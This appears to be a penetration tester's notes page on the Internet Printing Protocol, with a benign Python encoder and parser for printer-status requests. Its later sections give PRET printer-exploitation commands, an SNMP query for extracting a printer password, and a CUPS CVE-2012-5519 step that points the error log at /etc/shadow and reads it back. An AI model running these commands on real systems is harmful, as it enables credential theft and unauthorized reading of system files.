Internet Printing Protocol (IPP)
The Internet Printing Protocol (IPP) is a protocol to manage printers and print jobs, query printer status, and perform other tasks.
Port: 631 (TCP)
Refer to the IPP Guide. Not all printers use the IPP protocol. See also: Hacking Network Printers.
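The wire encoding behind the "query printer status" task, as an added example (not from these notes or from PRET): it builds a Get-Printer-Attributes request per RFC 8010 and parses a reply, which is enough to inventory what a printer on port 631 reports about itself. The function names, constant names and the sample response are constructed for illustration.

```python
import struct

# Tag values from RFC 8010 (IPP encoding); names below are this example's own.
OP_GET_PRINTER_ATTRIBUTES = 0x000B
GROUPS = {0x01: "operation", 0x02: "job", 0x04: "printer", 0x05: "unsupported"}
END, INTEGER, ENUM, KEYWORD, URI, CHARSET, LANGUAGE = 0x03, 0x21, 0x23, 0x44, 0x45, 0x47, 0x48

def attr(tag, name, value):
    """Encode one attribute: tag, name-length, name, value-length, value."""
    n = name.encode()
    v = value if isinstance(value, bytes) else value.encode()
    return struct.pack(">BH", tag, len(n)) + n + struct.pack(">H", len(v)) + v

def build_get_printer_attributes(printer_uri, request_id=1):
    """Request body for an HTTP POST with Content-Type: application/ipp."""
    return (struct.pack(">BBHIB", 1, 1, OP_GET_PRINTER_ATTRIBUTES, request_id, 0x01)
            + attr(CHARSET, "attributes-charset", "utf-8")
            + attr(LANGUAGE, "attributes-natural-language", "en")
            + attr(URI, "printer-uri", printer_uri) + bytes([END]))

def parse_message(data):
    """Return (version, status or operation code, request_id, groups)."""
    major, minor, code, request_id = struct.unpack_from(">BBHI", data, 0)
    pos, groups, group, name = 8, {}, None, None
    while pos < len(data):
        tag, pos = data[pos], pos + 1
        if tag == END:
            break
        if tag < 0x10:  # delimiter tag opens a new attribute group
            group, name = groups.setdefault(GROUPS.get(tag, hex(tag)), {}), None
            continue
        (nlen,) = struct.unpack_from(">H", data, pos)
        # A zero-length name adds another value to the previous attribute.
        name = data[pos + 2:pos + 2 + nlen].decode() if nlen else name
        pos += 2 + nlen
        (vlen,) = struct.unpack_from(">H", data, pos)
        raw, pos = data[pos + 2:pos + 2 + vlen], pos + 2 + vlen
        if len(raw) != vlen or group is None or name is None:
            raise ValueError("truncated or malformed IPP message")
        is_int = tag in (INTEGER, ENUM)
        value = int.from_bytes(raw, "big", signed=True) if is_int else raw.decode("utf-8", "replace")
        group.setdefault(name, []).append(value)
    return (major, minor), code, request_id, groups

# Constructed sample response (not captured from a real device): printer-state 3 = idle.
SAMPLE_RESPONSE = (struct.pack(">BBHIB", 1, 1, 0x0000, 1, 0x01)
    + attr(CHARSET, "attributes-charset", "utf-8") + attr(LANGUAGE, "attributes-natural-language", "en")
    + b"\x04" + attr(KEYWORD, "ipp-versions-supported", "1.1") + attr(KEYWORD, "", "2.0")
    + attr(ENUM, "printer-state", struct.pack(">i", 3)) + b"\x03")
```

`parse_message(SAMPLE_RESPONSE)` returns the version, status code 0 (successful-ok), the request id and the attributes grouped as `operation` and `printer`.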
IPP vulnerabilities ⚠️
See the Printer Security Testing Cheat Sheet.
You can use the PRET (3.4k ⭐) toolkit to try to exploit printers using the IPP protocol. You can install it using:
$ git clone https://github.com/RUB-NDS/PRET && cd PRET
$ python2 -m pip install colorama pysnmp
Discover printers
$ python pret.py
Once you have found a printer, you must find which language the printer understands:
- xxx.lan ps: PostScript language
- IP pjl: Printer Job Language
- /dev/usb/lp0 pcl: Printer Command Language. Must be directly connected (for instance, by USB).
$ python pret.py [options above]
xxx> help
➡️ You can check the web interface (IP:631) if any.
➡️ You may use PRETty (0.2k ⭐), an automation of PRET in Python.
To-do
Stuff that I found, but never read/used yet.
- SNMP could be used to get the printer password (snmpget -v 1 -c public IP .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
# Paste the space-separated hex bytes returned by snmpget, then decode them to text
bytes_hex = "<returned bytes here>"
bytes_list = bytes_hex.split()
print("".join([chr(int(byte, 16)) for byte in bytes_list]))
- CUPS (CVE-2012-5519 == arbitrary read; or, if there are printers, we can also use CVE-2015-1158)
$ cupsctl ErrorLog=/etc/shadow
$ curl localhost:631/admin/log/error_log?